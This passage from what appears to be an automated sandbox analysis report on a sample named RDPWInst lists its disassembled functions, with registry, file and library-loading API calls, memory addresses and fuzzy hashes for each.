                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: $sD
                                                                                • API String ID: 47109696-3047594130
                                                                                • Opcode ID: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                • Instruction ID: e2b80e318971c5615629c962b670a86c0d36aae3c059df6a015560dc8872c8c4
                                                                                • Opcode Fuzzy Hash: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                • Instruction Fuzzy Hash: F9013171E14304EFDB05CFA9C892A5DB7F8EB4D310F6140B6E810A7351D675EE10DA54
                                                                                Function 0043924C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,004392B4,?,?,ImagePath,00000000,004392B4), ref: 0043927D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: ImagePath
                                                                                • API String ID: 3660427363-1008103227
                                                                                • Opcode ID: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                • Instruction ID: 752c998736a6c6af0e84b74aa330b189edc71255cbbe141243c37e1b481e64ab
                                                                                • Opcode Fuzzy Hash: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                • Instruction Fuzzy Hash: 90F01CA23042406FD744EA6E9C81F6B96DCDBCC714F14443EB288C7282D968CC098769
                                                                                Function 004389D8 Relevance: 3.1, APIs: 2, Instructions: 98registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A52
                                                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A8C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateOpen
                                                                                • String ID:
                                                                                • API String ID: 436179556-0
                                                                                • Opcode ID: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                • Instruction ID: 0ee4ecbf886d923d9c7bbf31fd477b4cbe2ff9aaa7d825c43a2ca86d525438e5
                                                                                • Opcode Fuzzy Hash: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                • Instruction Fuzzy Hash: E3315C70B04348AFDB11EBA98842B9EF7F9AB48304F50447EB544E7282DA78AF059759
                                                                                Function 0040920C Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                  • Part of subcall function 0040941C: lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                  • Part of subcall function 0040941C: lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileLibraryLoadModuleNamelstrcpynlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2912033995-0
                                                                                • Opcode ID: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                • Instruction ID: f6262d892358e01f8eacd9344567111696420312dcbdab07fa653b046a231d07
                                                                                • Opcode Fuzzy Hash: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                • Instruction Fuzzy Hash: 43114270A4421CABDB10EB51CD86BDD73B8DB04304F5144FBB509B72D1DA785E858A59
                                                                                Function 0040F77C Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F788
                                                                                • GetLastError.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F79A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 1799206407-0
                                                                                • Opcode ID: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                • Instruction ID: 8407d2a862a87125c88b0e9e376b57c3f61afd3adb54f06dd13a213247f2bd06
                                                                                • Opcode Fuzzy Hash: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                • Instruction Fuzzy Hash: 5CE04F1732122016DD3530BC19CA6AB1244498B7A83280937FC51F3BD2D23E4D5B519F
                                                                                Function 004046C0 Relevance: 3.0, APIs: 2, Instructions: 29fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004046DF
                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004046E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID:
                                                                                • API String ID: 442123175-0
                                                                                • Opcode ID: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                                                • Instruction ID: 9545df1e08670e3e4372b9a2ed629c94f39af83de60d034ef920510406bc5815
                                                                                • Opcode Fuzzy Hash: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                                                • Instruction Fuzzy Hash: D1E092B16041106BDB54CE6A9980A6723CC9B89354F008877BA04EB282E2B9CC015776
                                                                                Function 00414634 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedCompareExchange.KERNEL32(00449DB0,00000001,00000000), ref: 00414644
                                                                                • CloseHandle.KERNEL32(00000000,00449DB0,00000001,00000000,?,00449EB4,00414694,00449EB4,00000000,?,0041770A,00000000,00417872), ref: 00414651
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCompareExchangeHandleInterlocked
                                                                                • String ID:
                                                                                • API String ID: 190309047-0
                                                                                • Opcode ID: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                                                • Instruction ID: 63ce862fb254c7bb27cf93041dcda8475e179d55c14a8c261316d7a773b2a43f
                                                                                • Opcode Fuzzy Hash: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                                                • Instruction Fuzzy Hash: 3FD0A7F275172033DA2021A94DC1FAB014C8B9975CF015563BE44EF283D59CCC9102FC
                                                                                Function 00438860 Relevance: 3.0, APIs: 2, Instructions: 19registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                • RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFlush
                                                                                • String ID:
                                                                                • API String ID: 320916635-0
                                                                                • Opcode ID: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                                                • Instruction ID: 02ceb0405e4d458188627afd9845f8495605ad087acfb065aa2a027a14818eba
                                                                                • Opcode Fuzzy Hash: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                                                • Instruction Fuzzy Hash: 8DE0ECA1B003008ADF64FF7684C4A12B6D86F48304B48D4BAB808DE14BDA3CD4109725
                                                                                Function 00438B08 Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                                                • Instruction ID: 89278caf5ef83198d89b8dc4a9c9fb76eb3a10e2e46a05883e0df08903897f1a
                                                                                • Opcode Fuzzy Hash: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                                                • Instruction Fuzzy Hash: C921D370B04344AFDB11EB65C842B9EF7F99B48304F2144BEB804E3282DA7C9E059758
                                                                                Function 004083B0 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 004083CE
                                                                                  • Part of subcall function 0040920C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                  • Part of subcall function 0040920C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileModuleName$LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 4113206344-0
                                                                                • Opcode ID: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                                                • Instruction ID: 90d1829834ce79f86c13b7573f8e9a8c333b05ddd33e28dd31ebb7d28ab9999b
                                                                                • Opcode Fuzzy Hash: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                                                • Instruction Fuzzy Hash: 84E0C9B1A003109BCB10DE58C9C5A477798AB48764F044AAAED64EF387D775DD1087D5
                                                                                Function 0040F650 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000,?,?,004257A8,0042F5F0,00000000,0042F6D7,?,?,004257A8), ref: 0040F68A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                                                • Instruction ID: 32e31081b98e7b24079041a639207f5f8240b3ca2c27c4b0157ee02f81a1b514
                                                                                • Opcode Fuzzy Hash: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                                                • Instruction Fuzzy Hash: 99E0C2A3B4072036F63072AD4C82FAB9158CB867B4F470336FA50FB2D2C0999C0241AC
                                                                                Function 0040F6C0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040F6D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                                                • Instruction ID: 3fe4e569543b3f1381ab86603454923b4de8c4718f21568c98d02def12c07fd2
                                                                                • Opcode Fuzzy Hash: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                                                • Instruction Fuzzy Hash: 42D05BB63082507AD220D55B5C44DAB6BDCDBC5771F10063FB658C31C0D6308C05C275
                                                                                Function 0043A644 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetNativeSystemInfo.KERNEL32 ref: 0043A648
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoNativeSystem
                                                                                • String ID:
                                                                                • API String ID: 1721193555-0
                                                                                • Opcode ID: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                                                • Instruction ID: fbf5644ea725b9a19c2d11835783dba3dfebd9b236010a27cc61b97838af9c82
                                                                                • Opcode Fuzzy Hash: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                                                • Instruction Fuzzy Hash: 66E086584BC14148C60523354C2F7A32688832A324F4D2923C4D985262E25FC0B77BAF
                                                                                Function 0040F7C4 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(00000000,00447324,0043D137,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F7CF
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                                                • Instruction ID: dfbd20c989cc919aa742ea809a195094cafabb968b5a4f056a7cb7a67f60922a
                                                                                • Opcode Fuzzy Hash: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                                                • Instruction Fuzzy Hash: F3C08CA03012000AEE30B1BD1DCA80B02884A0D2383A02A37F069F3AD3D23E886F201A
                                                                                Function 0040FB5C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000001,0040F8C6,00000000,0040F8EB,?,00447324,00000000,00000000,00000000,00000000,?,0043D15F,00000000,0043D55E), ref: 0040FB69
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateDirectory
                                                                                • String ID:
                                                                                • API String ID: 4241100979-0
                                                                                • Opcode ID: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                                                • Instruction ID: 5428b92e23564d17d1f876684be8f9c2b3243abbeaf0de8523baba27188e832a
                                                                                • Opcode Fuzzy Hash: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
